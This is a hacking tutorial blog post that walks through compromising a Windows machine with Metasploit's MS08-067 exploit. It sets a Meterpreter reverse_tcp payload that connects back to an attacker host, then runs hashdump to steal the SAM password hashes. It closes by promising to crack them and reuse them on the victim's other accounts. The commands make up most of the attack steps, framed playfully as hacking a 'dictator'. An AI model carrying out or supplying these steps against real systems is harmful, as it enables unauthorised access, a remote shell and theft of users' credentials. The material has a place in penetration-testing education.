Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer

Apr 30, 2013 04:46 PM
May 26, 2016 07:26 PM
635029189897622221.jpg

Welcome back, my fledgling hackers!

There's an evil dictator hellbent on destroying the world, and in one of our last hacks, we successfully compromised his computer and saved the world from nuclear annihilation. Then, we covered our tracks so no one would know what we did, and developed a hack to capture screenshots of his computer periodically so we could track of what he was up to next.

With this new hack, we'll capture the passwords from the maniacal dictator's computer so that we can access his PC through his account— or anyone else's account on his computer, including the most important account—the system administrator's.

635029190392923091.jpg

Windows systems store passwords in encrypted form inside a file called the SAM file. This file resides in the c:\windows\system32\config\sam directory. If we can gain access to his computer, as we've already done, we can grab a copy of the encrypted passwords, transfer them to our computer, and then crack them later at our leisure.

So, let's fire up our trusty framework hacking tool, Metasploit, and let's go grab those passwords!

Step 1: Compromise the System

Once again, let's use a tried and true exploit; type:

  • msf > use exploit/windows/smb/ms08_067_netapi
635029180457125912.jpg

Now, let's set the payload to our all powerful Meterpreter.

  • msf (ms08_067_netapi) > set payload /windows/meterpreter/reverse_tcp
635029180627634211.jpg

It's always a good idea now to check our options.

635029181173947171.jpg

As you can see, we'll need both the LHOST (the IP address of our computer) and RHOST (the IP address of the victim computer). Let's set these now.

  • msf (ms08_067_netapi) > set RHOST 192.168.1.108
  • msf (ms08_067_netapi) > set LHOST 192.168.1.109

With everything set, now all that's left to do is exploit!

  • msf (ms08_067_netapi) > exploit
635029181908396461.jpg

We now have a Meterpreter terminal prompt on the maniacal dictator's computer!

Step 2: Grab the Password File

As you've seen in my previous tutorials, the Meterpreter has several powerful scripts built in. In this case, we'll be using one called hashdump.

Just a bit of explanation before we grab those passwords...

For security purposes, most operating systems (including all of the modern Windows operating systems) store the user passwords in hashes. This is a one-way encryption that make the passwords unreadable to humans. These are the hashes we're after, hence the script is called hashdump.

So, let's go ahead and grab those hashes!

  • meterpreter > hashdump
635029182055036718.jpg

As you can see, we now have several users and their encrypted password hashes. Of course, right now we can't read them, but come back for my next tutorial and I'll show you how to crack them so that we can use them at our leisure.

635029190919112016.jpg

Remember, once we have the maniacal dictator's password, it's likely that he uses that same password on systems other than this one (i.e. email, secure areas, etc.), giving us access to many of his secure assets.

Photos by Andrey Popov / Shutterstock, Rob Hyrons / Shutterstock, Maksim Kabakou / Shutterstock

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!